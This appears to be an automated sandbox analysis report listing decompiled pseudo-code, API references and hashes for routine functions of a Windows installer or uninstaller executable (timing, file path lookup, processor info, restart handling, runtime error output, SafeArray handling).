                                                            0x00408ebc
                                                            0x00408ebf
                                                            0x00000000
                                                            0x00000000
                                                            0x00408ec6
                                                            0x00408ece
                                                            0x00408ed4
                                                            0x00408edf
                                                            0x00000000
                                                            0x00408edf
                                                            0x00408ed6
                                                            0x00000000
                                                            0x00408ed6
                                                            0x00000000
                                                            0x00408e62
                                                            0x00408e65
                                                            0x00000000
                                                            0x00408e74
                                                            0x00408e74
                                                            0x00408e74
                                                            0x00000000
                                                            0x00408e7d
                                                            0x00408e80
                                                            0x00000000
                                                            0x00000000
                                                            0x00408e85
                                                            0x00408eae
                                                            0x00408eb2
                                                            0x00408eb7
                                                            0x00408eba
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00408eba
                                                            0x00408e8e
                                                            0x00408e94
                                                            0x00000000
                                                            0x00000000
                                                            0x00408e9b
                                                            0x00408e9e
                                                            0x00408ea5
                                                            0x00000000
                                                            0x00408ea5
                                                            0x00408fa1
                                                            0x00408fac

                                                            APIs
                                                              • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                            • GetTickCount.KERNEL32 ref: 00408E4F
                                                            • GetTickCount.KERNEL32 ref: 00408E67
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                            • GetTickCount.KERNEL32 ref: 00408EC1
                                                            • GetTickCount.KERNEL32 ref: 00408EF8
                                                            • GetTickCount.KERNEL32 ref: 00408F22
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                            • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E006A5F04(void* __eax, void* __edx, intOrPtr _a4076) {
				char _v4120;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t6;
				void* _t11;
				signed char _t14;
				void* _t22;
				intOrPtr* _t23;
				void* _t24;
				void* _t28;
				long _t30;
				void* _t31;
				void* _t32;
				void* _t33;

				_push(__eax);
				_t6 = 2;
				do {
					_t32 = _t32 + 0xfffff004;
					_push(_t6);
					_t6 = _t6 - 1;
				} while (_t6 != 0);
				_t33 = _t32 + 4;
				_t28 = __edx;
				_t29 = _a4076;
				_t23 = E00414020(_t22, _a4076, GetModuleHandleW(L"kernel32.dll"), L"GetFinalPathNameByHandleW");
				if(_t23 == 0) {
					L11:
					_t11 = E0040A5A8(_t28, _t29);
				} else {
					_t14 = GetFileAttributesW(E0040B278(_t29));
					if(_t14 == 0xffffffff) {
						goto L11;
					} else {
						if((_t14 & 0x00000010) == 0) {
							_t30 = 0;
							__eflags = 0;
						} else {
							_t30 = 0x2000000;
						}
						_t31 = CreateFileW(E0040B278(_t29), 0, 7, 0, 3, _t30, 0);
						if(_t31 == 0xffffffff) {
							goto L11;
						} else {
							_t24 =  *_t23(_t31,  &_v4120, 0x1000, 0);
							CloseHandle(_t31);
							if(_t24 <= 0) {
								goto L11;
							} else {
								_t41 = _t24 - 0xff0;
								if(_t24 >= 0xff0) {
									goto L11;
								} else {
									_t11 = E006A5E1C(_t33, _t24, _t28, _t29, _t41);
								}
							}
						}
					}
				}
				return _t11;
			}


















                                                            0x006a5f08
                                                            0x006a5f09
                                                            0x006a5f0e
                                                            0x006a5f0e
                                                            0x006a5f14
                                                            0x006a5f15
                                                            0x006a5f15
                                                            0x006a5f1f
                                                            0x006a5f22
                                                            0x006a5f24
                                                            0x006a5f3b
                                                            0x006a5f3f
                                                            0x006a5fad
                                                            0x006a5fb1
                                                            0x006a5f41
                                                            0x006a5f49
                                                            0x006a5f51
                                                            0x00000000
                                                            0x006a5f53
                                                            0x006a5f55
                                                            0x006a5f5e
                                                            0x006a5f5e
                                                            0x006a5f57
                                                            0x006a5f57
                                                            0x006a5f57
                                                            0x006a5f78
                                                            0x006a5f7d
                                                            0x00000000
                                                            0x006a5f7f
                                                            0x006a5f8e
                                                            0x006a5f91
                                                            0x006a5f98
                                                            0x00000000
                                                            0x006a5f9a
                                                            0x006a5f9a
                                                            0x006a5fa0
                                                            0x00000000
                                                            0x006a5fa2
                                                            0x006a5fa6
                                                            0x006a5fa6
                                                            0x006a5fa0
                                                            0x006a5f98
                                                            0x006a5f7d
                                                            0x006a5f51
                                                            0x006a5fc0

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                            • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                            • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandle$AttributesCloseCreateModule
                                                            • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                            • API String ID: 791737717-340263132
                                                            • Opcode ID: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
                                                            • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                            • Opcode Fuzzy Hash: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
                                                            • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E00408BB4(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00405324();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E00406F0C(_v16);
						_push(_t41);
						_push(E00408C62);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00405324();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E00408C69);
							return E00406F28(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E004099B8();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                            0x00408bb5
                                                            0x00408bb7
                                                            0x00408bbc
                                                            0x00408bd6
                                                            0x00408c69
                                                            0x00408c69
                                                            0x00000000
                                                            0x00408bdc
                                                            0x00408bdc
                                                            0x00408bdf
                                                            0x00408be0
                                                            0x00408be2
                                                            0x00408be9
                                                            0x00000000
                                                            0x00408bf5
                                                            0x00408bfd
                                                            0x00408c02
                                                            0x00408c03
                                                            0x00408c08
                                                            0x00408c0b
                                                            0x00408c11
                                                            0x00408c15
                                                            0x00408c16
                                                            0x00408c1b
                                                            0x00408c22
                                                            0x00408c4c
                                                            0x00408c4e
                                                            0x00408c51
                                                            0x00408c54
                                                            0x00408c61
                                                            0x00408c24
                                                            0x00408c24
                                                            0x00408c3f
                                                            0x00408c42
                                                            0x00408c4a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00408c4a
                                                            0x00408c35
                                                            0x00408c38
                                                            0x00408c70
                                                            0x00408c76
                                                            0x00408c76
                                                            0x00408c22
                                                            0x00408be9
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                            • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E006B8141(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char* _t18;
				char* _t23;
				intOrPtr* _t25;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t45;
				void* _t48;

				if( *((char*)(_t48 - 0x21)) != 0) {
					_t18 =  *0x6cdfdc; // 0x6d62e4
					if( *_t18 != 0) {
						E00616130(L"Not restarting Windows because Uninstall is being run from the debugger.", __ebx, __edi, __esi);
					} else {
						E00616130(L"Restarting Windows.", __ebx, __edi, __esi);
						_t23 =  *0x6cdefc; // 0x6d6825
						 *_t23 = 1;
						if(E0060F6D8() == 0) {
							_t25 =  *0x6cdec4; // 0x6d579c
							SetForegroundWindow( *( *_t25 + 0x188));
							_push(1);
							_push(1);
							_t29 =  *0x6cded8; // 0x6d5c28
							_t3 = _t29 + 0x164; // 0x0
							_push(E0040B278( *_t3));
							_t32 =  *0x6cded8; // 0x6d5c28
							_t4 = _t32 + 0x15c; // 0x0
							_t34 = E0040B278( *_t4);
							_pop(_t45);
							E006AF190(_t34, __ebx, 0x30, _t45, __edi, __esi);
						}
					}
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(E006B8200);
				E0040A1C8(_t48 - 0x48);
				E0040A228(_t48 - 0x3c, 5);
				_t44 =  *0x4012b8; // 0x4012bc
				E0040C024(_t48 - 0x20, 7, _t44);
				return E0040A1EC(_t48 - 4);
			}













                                                            0x006b8145
                                                            0x006b8147
                                                            0x006b814f
                                                            0x006b81b6
                                                            0x006b8151
                                                            0x006b8156
                                                            0x006b815b
                                                            0x006b8160
                                                            0x006b816a
                                                            0x006b816c
                                                            0x006b817a
                                                            0x006b817f
                                                            0x006b8181
                                                            0x006b8183
                                                            0x006b8188
                                                            0x006b8193
                                                            0x006b8194
                                                            0x006b8199
                                                            0x006b819f
                                                            0x006b81a9
                                                            0x006b81aa
                                                            0x006b81aa
                                                            0x006b816a
                                                            0x006b814f
                                                            0x006b81bd
                                                            0x006b81c0
                                                            0x006b81c3
                                                            0x006b81cb
                                                            0x006b81d8
                                                            0x006b81e5
                                                            0x006b81eb
                                                            0x006b81f8

                                                            APIs
                                                              • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                              • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • SetForegroundWindow.USER32(?), ref: 006B817A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                            • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                            • API String ID: 3179053593-36556386
                                                            • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                            • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                            • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                            • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 43%
                                                            			E00409E60(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x6cf05c == 0) {
					if( *0x6c5036 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L0040529C();
					}
					return _t3;
				} else {
					if( *0x6cf348 == 0xd7b2 &&  *0x6cf350 > 0) {
						 *0x6cf360();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E0040AC70(0x409ef4);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                            0x00409e68
                                                            0x00409ece
                                                            0x00409ed0
                                                            0x00409ed2
                                                            0x00409ed7
                                                            0x00409edc
                                                            0x00409ede
                                                            0x00409ede
                                                            0x00409ee4
                                                            0x00409e6a
                                                            0x00409e73
                                                            0x00409e83
                                                            0x00409e83
                                                            0x00409e9f
                                                            0x00409eb2
                                                            0x00409ec6
                                                            0x00409ec6

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                            • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                            • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                            • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E0043171C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					L00430EC8(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L0042F04C();
					return L00430EC8(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L0042F628();
						_t123 = _t64;
						if(_t123 == 0) {
							E00430C20(_t110);
						}
						L00431164(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00431694(_v788 - 1, _t125) != 0) {
								L0042F650();
								L00430EC8(_v792);
								L0042F650();
								L00430EC8( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004316C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L0042F630();
							L00430EC8(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L0042F638();
							L00430EC8(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                            0x0043171c
                                                            0x00431728
                                                            0x0043172e
                                                            0x00431734
                                                            0x00431744
                                                            0x0043174b
                                                            0x0043174b
                                                            0x00431756
                                                            0x00431764
                                                            0x004318ef
                                                            0x004318f6
                                                            0x004318f7
                                                            0x00000000
                                                            0x0043176a
                                                            0x0043176d
                                                            0x0043178b
                                                            0x0043176f
                                                            0x0043177a
                                                            0x0043177a
                                                            0x0043179a
                                                            0x004317a6
                                                            0x004317a9
                                                            0x00431816
                                                            0x0043181c
                                                            0x0043181d
                                                            0x00431823
                                                            0x00431824
                                                            0x00431826
                                                            0x0043182b
                                                            0x0043182f
                                                            0x00431831
                                                            0x00431831
                                                            0x0043183c
                                                            0x00431847
                                                            0x00431852
                                                            0x0043185b
                                                            0x0043185e
                                                            0x0043187a
                                                            0x00431881
                                                            0x0043188c
                                                            0x004318a3
                                                            0x004318a8
                                                            0x004318bc
                                                            0x004318c1
                                                            0x004318d4
                                                            0x004318d4
                                                            0x004318dd
                                                            0x00431860
                                                            0x00431860
                                                            0x00431861
                                                            0x00431867
                                                            0x0043186d
                                                            0x0043186f
                                                            0x00431871
                                                            0x00431874
                                                            0x00431877
                                                            0x00431877
                                                            0x0043187a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0043187a
                                                            0x004317ab
                                                            0x004317ab
                                                            0x004317ac
                                                            0x004317ae
                                                            0x004317b4
                                                            0x004317b6
                                                            0x004317c5
                                                            0x004317c6
                                                            0x004317d0
                                                            0x004317d1
                                                            0x004317d6
                                                            0x004317e1
                                                            0x004317e2
                                                            0x004317ec
                                                            0x004317ed
                                                            0x004317f2
                                                            0x0043180d
                                                            0x0043180f
                                                            0x00431810
                                                            0x00431813
                                                            0x00431813
                                                            0x00000000
                                                            0x004317b4
                                                            0x004317a9

                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                            • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                            • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                            • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E006AE6F8(signed int __eax) {
				intOrPtr* _t14;
				signed int _t18;
				intOrPtr* _t19;
				intOrPtr* _t23;
				signed int _t26;
				long _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				signed int _t37;
				intOrPtr* _t38;

				_t37 = __eax;
				 *0x6d6827 = __eax ^ 0x00000001;
				_t14 =  *0x6cdec4; // 0x6d579c
				_t18 = GetWindowLongW( *( *_t14 + 0x188), 0xffffffec) & 0xffffff00 | (_t17 & 0x00000080) == 0x00000000;
				if(_t37 != _t18) {
					_t19 =  *0x6cdec4; // 0x6d579c
					SetWindowPos( *( *_t19 + 0x188), 0, 0, 0, 0, 0, 0x97);
					_t23 =  *0x6cdec4; // 0x6d579c
					_t26 = GetWindowLongW( *( *_t23 + 0x188), 0xffffffec);
					if(_t37 == 0) {
						_t27 = _t26 | 0x00000080;
					} else {
						_t27 = _t26 & 0xffffff7f;
					}
					_t38 =  *0x6cdec4; // 0x6d579c
					SetWindowLongW( *( *_t38 + 0x188), 0xffffffec, _t27);
					if(_t37 == 0) {
						_t29 =  *0x6cdec4; // 0x6d579c
